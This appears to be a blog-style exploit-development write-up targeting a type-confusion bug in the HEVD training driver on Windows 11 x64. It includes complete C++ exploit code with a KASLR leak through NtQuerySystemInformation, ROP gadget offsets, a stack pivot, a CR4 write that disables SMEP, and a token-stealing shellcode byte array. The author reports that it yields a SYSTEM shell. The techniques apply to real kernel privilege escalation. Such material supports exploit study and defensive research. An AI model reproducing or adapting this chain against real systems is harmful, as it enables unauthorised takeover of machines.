_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
WinDBG output:
KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.
Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
Subcode: 0x4 FAST_FAIL_INCORRECT_STACK
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409
KASLR Bypass with NtQuerySystemInformation
As mentioned before, NtQuerySystemInformation is a function that, if configured correctly, can leak kernel module base addresses by performing system query operations. From the results of these queries we can leak kernel addresses from user-land.
As mentioned by Trustwave:
The function NtQuerySystemInformation is implemented in NTDLL. And as a kernel API, it is always being updated across Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since the early days of Windows NT-family systems with different syscall IDs.
<...snip...>
The function basically retrieves specific information from the environment, and its structure is very simple.
<...snip...>
There is a lot of data that can be retrieved using these classes along with the function: information regarding the system, processes, objects and others.
So now we have a question: if we can leak addresses and calculate the correct offset from the base address to our gadget, how can we search memory for the gadgets themselves?
The solution is as simple as follows:
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
With the file rop.txt we have addresses, but we're still unable to pick the correct ones to base a valid calculation on.
The kernel image, for example, sometimes uses addresses inside the module as "buffers", and the data can point to another, invalid location. At kernel level, functions change, and amid all these changes you will never hit the correct offset through a simple .writemem dump.
The biggest issue is that when .writemem is used, it dumps the start and end of a defined module, but it does not automatically align the offsets of functions correctly. This happens due to module segments and malleable data, which can change from time to time as part of normal OS operation. For example, if we search for opcodes using the WinDBG command line, there's a static buffer address which returns exactly the opcodes that we sent.
The addresses above seem to be valid, and they are identical because they contain our opcodes; the problem is that 0xfffff80051ef8500 is a buffer, and it returns everything we put into the WinDBG search function (the s command). So no matter how you change the opcodes, they always come back in a buffer.
OK, now let's say that ROPgadget.py returns the following output:
--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret
If we try to check whether those opcodes are the same in our current VM, we'll notice something like this:
As you can see, the offset from .writemem is invalid, meaning that something went wrong. A simple fix for this issue is to look at our ROP gadgets, see what assembly code we need, convert that code into opcodes, and then search valid live memory for the addresses to start our ROP chain.
4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
Now we know that the kernel (nt) base address 0xfffff80051200000 + 0x00000000002ce4c0 resolves to the nt!ExfReleasePushLock+0x20 gadget.
Stack Pivoting & ROP chain
With the previous idea of what exactly a ROP chain means, it's now important to know which gadgets we need to change the CR4 register value using only kernel addresses.
STACK PIVOTING:
mov esp, 0x48000000
ROP CHAIN:
POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one
// The logic for the ROP chain
// 1 - Allocate memory in 0x48000000 region
// 2 - When we move the 0x48000000 address into our ESP/RSP register,
//     we can manipulate the range of addresses that we'll [CALL/JMP] through.
Now, knowing our ROP chain logic, we need to discuss the Stack Pivoting technique.
Stack pivoting basically means swapping the current kernel stack for a user-controlled fake stack; this modification is made possible by changing the RSP register value. When we change RSP to point at a user-controlled stack, we can manipulate execution through a ROP chain, since every return lands back on kernel addresses we chose.
Getting back to the code, we implement our attacker-controlled Fake Stack.
<...snip...>
typedef struct _USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
} USER_CONTROLLED_OBJECT; // name the typedef so USER_CONTROLLED_OBJECT is usable below
typedef struct _SMEP {
INT64 STACK_PIVOT;
INT64 POP_RCX;
INT64 MOV_CR4_RCX;
} SMEP;
<...snip...>
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
SMEPBypass.STACK_PIVOT = STACK_PIVOT;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
/*
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
*******************************************************************************
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
*/
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
SMEPBypass.POP_RCX = POP_RCX;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
/*
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
nt!KeClockInterruptNotify+0x2ff5:
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
*/
INT64 MOV_CR4_RCX = NT_BASE_ADDR + 0x003a5fc7; // gadget is `mov cr4, rcx`
SMEPBypass.MOV_CR4_RCX = MOV_CR4_RCX;
std::cout << "[+] MOV_CR4_RCX: 0x" << std::hex << MOV_CR4_RCX << std::endl << std::endl;
/*
kd> u nt!KeFlushCurrentTbImmediately+0x17
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
*/
return TRUE;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
IO_STATUS_BLOCK ioStatusBlock = { 0 }; // NtDeviceIoControlFile writes a full IO_STATUS_BLOCK, not a PVOID
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
int main() {
SMEPBypassInitializer();
exploit();
return 0;
}
After the exploit executes, we have the following WinDBG output:
After the mov esp, 0x48000000 instruction executes, we notice that it crashed with an exception named UNEXPECTED_KERNEL_MODE_TRAP (7F); now let's look at our stack.
So, what can we do next?
Memory and Components
Now this blog post can really begin. With all the briefing covering the techniques done, it's time to explain why the stack is one of the most confusing things in exploit development; we will see how it can easily turn a simple vulnerability into a brain-melting issue.
Kernel Memory Management
Now we'll have to go deep into the Memory Management topic as a way to understand concepts about memory segments, virtual allocation, and paging.
According to Wikipedia
The kernel has full access to the systemβs memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is virtual addressing, usually achieved by paging and/or segmentation. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtualΒ address.
<β¦snipβ¦>
In computing, a virtual address space (VAS) or address space is the set of ranges of virtual addresses that an operating system makes available to a process.[1] The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer's instruction set architecture and supported by the operating system's pointer size implementation, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate address space.
As we can see, virtual addressing refers to the address space given to each user application and to kernel functions, reserving memory regions while the OS runs. When an application is initialized, the operating system understands that it needs to allocate new space in memory, addressed within a valid range of addresses, consequently avoiding damage to the kernel's current memory region.
That's the case when you try to play a game and, for some reason, a bunch of GBs of your memory is consumed before the game starts: the space was allocated up front, and most of that data and those addresses start out nulled until the game's file data begins to be loaded into memory.
With the malloc() and VirtualAlloc() functions you can actually "address" a range of virtual memory at a defined address; that's why Stack Pivoting is the best solution to make this exploit work.
Virtual Memory
As you can see in the image above, virtual addresses are what the application/process works with when sending data and values, so processes are able to query, allocate, or free each piece of data at any time.
As Wikipedia says:
In computing, virtual memory, or virtual storage,[b] is a memory management technique that provides an "idealized abstraction of the storage resources that are actually available on a given machine"[3] which "creates the illusion to users of a very large (main) memory".[4]
The computer's operating system, using a combination of hardware and software, maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory.[5] Address translation hardware in the CPU, often referred to as a Memory Management Unit (MMU), automatically translates virtual addresses to physical addresses. Software within the operating system may extend these capabilities, utilizing, e.g., disk storage, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physically present in the computer.
The primary benefits of virtual memory include freeing applications from having to manage a shared memory space, ability to share memory used by libraries between processes, increased security due to memory isolation, and being able to conceptually use more memory than might be physically available, using the technique of paging or segmentation.
As mentioned before, addressing/allocating virtual memory ranges (from a user-land perspective) allows us to manipulate the use of address data inside our current application, but there's a catch. When a range of virtual memory is allocated, it is not yet part of the OS's physical operations, due to the abstracted/fake nature of the allocation. Following our previous example, when a game starts, virtual memory is allocated and the Memory Management Unit (MMU) automatically translates data between physical and virtual addresses.
From a developer's perspective, when an application consumes memory it's important to free()/VirtualFree() unused data, to prevent the data from crashing the whole application once too many addresses are marked as in use by the system. The OS can also deal with processes that consume many addresses, automatically closing them to avoid critical errors. There are cases where applications exceed the free RAM capacity; in these situations, the allocation can be extended into disk storage.
Paged Memory
Physical memory, also called paged memory here, refers to memory which is in use by applications and processes. This memory scheme can retrieve data from virtual allocations, consequently using that data as part of the current execution.
According to Wikipedia:
Memory Paging
In computer operating systems, memory paging (or swapping on some Unix-like systems) is a memory management scheme by which a computer stores and retrieves data from secondary storage[a] for use in main memory.[citation needed] In this scheme, the operating system retrieves data from secondary storage in same-size blocks called pages. Paging is an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of available physical memory.
Page faults
When a process tries to reference a page not currently mapped to a page frame in RAM, the processor treats this invalid memory reference as a page fault and transfers control from the program to the operating system.
Page Table
A page table is the data structure used by a virtual memory system in a computer operating system to store the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the Random-Access Memory (RAM) subsystem. The page table is a key component of virtual address translation that is necessary to access data in memory.
The kernel can identify when an address lies in paged memory space by using the Page Table Entry (PTE), which distinguishes each type of allocation and maps memory segments.
With the Page Table Entry (PTE), the kernel is able to map the correct offset in order to translate data between each address. If there's an invalidly mapped memory region in the translation, a page fault is raised and the OS crashes. In the case of the Windows kernel, a _KTRAP_FRAME is produced, and an error like the one below should be expected:
Virtual Allocation issues in Windows System
When a binary exploit is developed, memory must be manipulated in most cases. With C/C++ functions such as VirtualAlloc(), if you allocate data at address 0x48000000 with size 0x1000, the range 0x48000000 up to 0x48001000 is now "addressed" in the page table as virtual addresses, and it will NOT be treated as part of physical memory by the kernel (it is not yet resident). It's important to pay attention to this detail: if you try to use the example above from a kernel-land perspective, a trap frame will be handled by WinDBG as follows:
To deal with this issue we can use the VirtualLock() function from C/C++, since it locks the specified region of the process's virtual address space into physical memory, thus preventing page faults. With that in mind, we can now turn our virtual memory address into a physically backed one.
It should now be possible to achieve code execution, right?
<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
Again, the same error popped up, even with the address mapped into physical memory.
Pain and Suffering due to Double Faults
After millions of tests with different patterns of memory allocations, I found a candidate solution. According to Martin Mielke and kristal-g, a reserved memory region should be placed before the main allocation at address 0x48000000.
When a trap frame occurs, we can clearly notice that addresses lower than 0x48000000 are used by the stack, and if those addresses remain unallocated, they can't be used by the current stack frame.
As you can see, 0x47fffe70 is being used by our stack frame, but since our allocation starts at address 0x48000000, it isn't a valid one. To deal with this issue, a memory reservation before 0x48000000 must be done.
<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<...snip...>
Now we can actually allocate at address 0x48000000-0x1000, finally allowing us to avoid the double-fault exception.
Let's run our exploit again; it should work!
No matter how you try to manage memory, changing addresses or filling the stack with data and hoping it works out, you will always get an exception, even when your code seems correct. It took me three months of rebooting my VM and tweaking the code to understand why it kept happening.
Stack vs. Data
Let's imagine the stack frame as a "big ball pit" holding a bunch of data: when a new ball is placed in the pit, all the others shift position. That's exactly what happens when you manipulate memory by swapping the current stack for another one, as mov esp, 0x48000000 does. When the current stack frame is replaced, the kernel believes the current physical memory is mapped to other processes, and for some reason you can actually see things like this after the crash.
<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
After polluting the stack frame in the reserved space below the stack-pivot offset, we can clearly see that different addresses pop up in our current stack frame, but our trap frame remains the same as before, 0x47fffe70. If we fill the whole stack with 0x41 bytes, we'll notice that some bytes appear with different values, as below:
<...snip...>
// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
With these results in mind, we have some alternatives to consider for this situation:
- Increase the size of the reserved memory space.
- Try to find a way to fix up the stack frame, in case we actually can't reserve memory below the stack-pivot address.
So, let's first try increasing the size of our reserved memory.
<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
For some reason, after increasing the reserved memory below mov esp, 0x48000000, the whole kernel crashed: when 0x48000000 is moved into the RSP register, our stack frame switches to the user process context due to the size of the address itself. That's why I mentioned earlier that the stack sometimes behaves like a ball pit, and after all that, we still get the same trap-frame exception.
No matter how you try to manipulate memory, it will always be caught and something will crash; WinDbg will then handle it as an exception and BSOD your system like a terrible horror movie.
Breakpoints??... ooohh!... Breakpoints!!!!
INT3, a.k.a. 0xCC, is the breakpoint instruction: a signal for any debugger to catch and stop execution of an attached process or of code under development. A breakpoint can be set by clicking a debug option somewhere in an IDE's UI, or by inserting the INT3 instruction directly into the target process via the 0xCC opcode. In the WinDbg command line, the bp command is available to set breakpoints on addresses, as follows:
// Common Breakpoint, just stop into this address before it runs
bp 0x48000000
// Conditional Breakpoint, stop when r12 register is not equal to 1337
// if not equal, changes current r12 value to 0x1337
// if equal, changes r12 reg value with r13 one
bp 0x48000000 ".if( @r12 != 0x1337) { r12=1337 }.else { r12=r13 }"
etc...
It's also possible to use this mechanism to breakpoint a shellcode and check that the code runs correctly during the exploit-development phase.
BYTE sc[256] = {
0xcc, // <--- We send a debugger signal and stop execution
      //      before the shellcode runs
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff
};
According to Wikipedia:
The INT3 instruction is a one-byte instruction defined for use by debuggers to temporarily replace an instruction in a running program in order to set a code breakpoint. The more general INT XXh instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long); see SIGTRAP.
The opcode for INT3 is 0xCC, as opposed to the opcode for INT immediate8, which is 0xCD immediate8. Since the dedicated 0xCC opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for an INT3, assemblers do not normally generate the generic 0xCD 0x03 opcode from mnemonics.
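To make the mechanics of that 0xCC byte concrete, here is a minimal userland sketch of my own (not from the original post): on Linux, executing an int3 raises SIGTRAP, which is exactly the signal a debugger would intercept; here a plain signal handler plays the debugger's role and simply records that the trap fired. The function and handler names are mine.

```c
#include <signal.h>

static volatile sig_atomic_t g_trapped = 0;

// Stand-in for a debugger: just record that the trap fired.
static void trap_handler(int sig)
{
    (void)sig;
    g_trapped = 1;
}

// Execute a breakpoint instruction and report whether it was caught.
int trigger_breakpoint(void)
{
    g_trapped = 0;
    signal(SIGTRAP, trap_handler);
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("int3"); // the one-byte 0xCC opcode itself
#else
    raise(SIGTRAP);           // portable fallback on non-x86
#endif
    signal(SIGTRAP, SIG_DFL);
    return g_trapped;
}
```

With no handler (and no debugger) attached, the same int3 would kill the process, which is why leftover 0xCC bytes in a shellcode are fatal once you stop debugging.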
With breakpoints explained, it's important to note that all of the previous tests were made with breakpoints in place in order to develop our exploit, but now it's time to drop them and skip all INT3 instructions.
Let's try re-running our exploit without breakpointing anything.
The kernel doesn't crash anymore, and system memory stays intact!
Now the shellcode executes after our SMEP bypass via the ROP chain, and we're able to spawn an NT AUTHORITY\SYSTEM shell.
BAAAM!! Finally!!!! An NT AUTHORITY\SYSTEM shell after all!
Breakpoints.... HAHA!! BREAKPOINTS!
